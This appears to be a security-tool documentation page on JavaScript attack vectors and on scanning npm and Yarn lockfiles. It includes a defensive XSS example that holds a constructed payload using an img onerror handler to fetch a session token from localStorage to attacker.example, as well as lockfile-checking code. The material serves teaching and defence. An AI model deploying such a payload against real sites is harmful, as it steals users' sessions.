JavaScript

Description

JavaScript is a programming language used for building web applications; it is also widely used for server-side (Node.js), desktop, and mobile applications. Its popularity makes it a prime target for attackers: because JavaScript runs in the browser of every visitor, many of its vulnerabilities can be exploited through ordinary web browsing, without any access to the server.
Most common JavaScript attack vectors include:

  • Executing malicious script in the victim's browser (cross-site scripting, XSS)
  • Stealing a user's established session data, or tokens kept in the browser's localStorage
  • Tricking users into performing unintended actions (for example cross-site request forgery), by exploiting vulnerabilities in the web application's source code

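The first two vectors above in working code, as an added example that is not part of the original page: a comment renderer that concatenates untrusted text into markup (the XSS sink), beside a hardened version that escapes every untrusted value for the HTML text context. The payload is constructed for the example and shows how a script injected this way reads a session token out of localStorage; the helper names are the example's own.

```javascript
// Added example, not from the original page. Shows the "executing malicious
// script" vector (XSS) and why a token in localStorage is exposed to it.

const ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };

// Escape a value for the HTML *text* context. Attribute, URL and JavaScript
// contexts need their own encoders; this one only covers element content.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => ESCAPES[ch]);
}

// Vulnerable: user-controlled text is concatenated straight into markup, so a
// payload can open a new element with an event handler the app never wrote.
function renderCommentUnsafe(author, text) {
  return `<div class="comment"><b>${author}</b>: ${text}</div>`;
}

// Hardened: every untrusted value is escaped before it becomes markup. In a
// real page prefer textContent / DOM APIs or a template engine that escapes by
// default; this shows what that escaping has to do.
function renderCommentSafe(author, text) {
  return `<div class="comment"><b>${escapeHtml(author)}</b>: ${escapeHtml(text)}</div>`;
}

// Check used only to demonstrate the difference: the only tags in the output
// should be the ones the renderer itself emits.
function containsInjectedMarkup(html) {
  const expected = /^<div class="comment"><b>[^<>]*<\/b>: [^<>]*<\/div>$/;
  return !expected.test(html);
}

// Constructed stored-XSS payload: once it runs in a victim's browser it can read
// anything in localStorage (unlike an HttpOnly cookie) and ship it to the attacker.
const PAYLOAD =
  `<img src=x onerror="fetch('https://attacker.example/?t='+localStorage.getItem('session'))">`;

function demo() {
  return {
    unsafe: renderCommentUnsafe("mallory", PAYLOAD),
    safe: renderCommentSafe("mallory", PAYLOAD),
  };
}
```

Run `demo()` and compare the two strings: the unsafe output contains a live `<img onerror=...>` element, the safe one renders the payload as visible text.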
Package Managers

NPM

NPM is the default package manager for Node.js, with a CLI tool that installs, manages, and removes Node.js packages and lets users publish open-source packages. Its registry offers more than a million packages. While that variety is an advantage, it also means a project can pull in a very large number of transitive dependencies, any of which may carry known or as yet undiscovered vulnerabilities. package.json declares the direct dependencies as version ranges; package-lock.json records the exact resolved version, source URL and integrity hash of every direct and transitive dependency, which is why scanners work from the lockfile rather than from package.json alone.

Files:
package.json
package-lock.json

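How a scanner recovers the dependency tree from package-lock.json, as an added example that is not part of the original page or of any particular tool: it reads the `packages` map of a lockfileVersion 2/3 lockfile, lists each resolved package with its nesting depth, and flags entries that are not pinned to the public registry with an integrity hash. The lockfile content is constructed for the example and the function names are the example's own.

```javascript
// Added example, not from the original page. Walks an npm package-lock.json
// (lockfileVersion 2/3 "packages" layout) the way a dependency scanner would.

// Constructed lockfile: two direct dependencies, one nested dependency, and one
// package fetched from an internal mirror without an integrity hash.
const SAMPLE_LOCK = JSON.stringify({
  name: "demo-app",
  lockfileVersion: 3,
  requires: true,
  packages: {
    "": { name: "demo-app", version: "1.0.0", dependencies: { left: "^1.0.0", mirror: "^2.0.0" } },
    "node_modules/left": {
      version: "1.4.0",
      resolved: "https://registry.npmjs.org/left/-/left-1.4.0.tgz",
      integrity: "sha512-AAAA",
      dependencies: { inner: "^0.3.0" },
    },
    "node_modules/left/node_modules/inner": {
      version: "0.3.2",
      resolved: "https://registry.npmjs.org/inner/-/inner-0.3.2.tgz",
      integrity: "sha512-BBBB",
    },
    "node_modules/mirror": {
      version: "2.1.0",
      resolved: "http://internal-mirror.example/mirror-2.1.0.tgz", // no integrity field
    },
  },
});

const REGISTRY = "https://registry.npmjs.org/";

function parseLock(lockJson) {
  const lock = typeof lockJson === "string" ? JSON.parse(lockJson) : lockJson;
  // lockfileVersion 1 nests "dependencies" instead; it is out of scope here.
  if (!lock.packages) throw new Error("only the lockfileVersion 2/3 'packages' layout is handled");
  return lock;
}

// Package name from a lockfile path: everything after the last "node_modules/",
// which keeps the "@scope/" prefix of scoped packages.
function nameFromPath(lockPath) {
  const marker = "node_modules/";
  const idx = lockPath.lastIndexOf(marker);
  return idx === -1 ? lockPath : lockPath.slice(idx + marker.length);
}

// Flattened dependency tree: [{ name, version, path, depth }], depth 1 = direct.
function resolvedPackages(lockJson) {
  const lock = parseLock(lockJson);
  return Object.entries(lock.packages)
    .filter(([p]) => p !== "") // "" is the project itself
    .map(([p, meta]) => ({
      name: nameFromPath(p),
      version: meta.version,
      path: p,
      depth: p.split("node_modules/").length - 1,
    }));
}

// Supply-chain hygiene checks a scanner applies to each locked package:
// a missing integrity hash means npm cannot verify the tarball, and a
// resolved URL outside the registry means the code came from somewhere else.
function lockfileFindings(lockJson) {
  const lock = parseLock(lockJson);
  const findings = [];
  for (const [p, meta] of Object.entries(lock.packages)) {
    if (p === "") continue;
    const name = nameFromPath(p);
    if (!meta.integrity) findings.push({ name, issue: "missing integrity hash" });
    if (meta.resolved && !meta.resolved.startsWith(REGISTRY)) {
      findings.push({ name, issue: `resolved outside registry: ${meta.resolved}` });
    }
  }
  return findings;
}
```

The same name/version pairs are what a scanner matches against its vulnerability database; `npm ls --all` prints the same tree from the installed node_modules, but the lockfile is what is committed and reviewed.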
Yarn

Yarn is a package manager that can also be used as a project manager. It was developed by Facebook in 2016 as a replacement for NPM, designed to offer features NPM lacked at the time (such as a lockfile pinning every resolved dependency version) and to be more secure, stable, and efficient. Since then NPM has added several of those features, so Yarn is now an alternative to NPM rather than a replacement. yarn.lock plays the same role as package-lock.json: it records the exact version and integrity hash of every direct and transitive dependency, and is what scanners read.

Files:
package.json
yarn.lock

Package manager    Scan    Fix    Dependency tree    License
npm                ✔️      ✔️     ✔️                 ✔️
Yarn               ✔️      ✔️     ✔️                 ✔️